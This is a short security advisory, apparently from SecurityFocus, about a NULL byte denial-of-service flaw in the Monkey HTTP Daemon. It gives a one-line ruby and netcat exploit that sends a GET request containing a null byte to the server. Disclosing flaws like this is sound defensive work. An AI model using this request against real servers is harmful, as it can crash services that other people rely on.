Monkey HTTP Daemon NULL Byte Denial of Service Vulnerability

An attacker can use readily available tools to exploit this issue.

The following example request and exploit is available:

ruby -e 'puts "GET /\x00 HTTP/1.1\r\n\r\n"'|netcat localhost 2001


 

Privacy Statement
Copyright 2010, SecurityFocus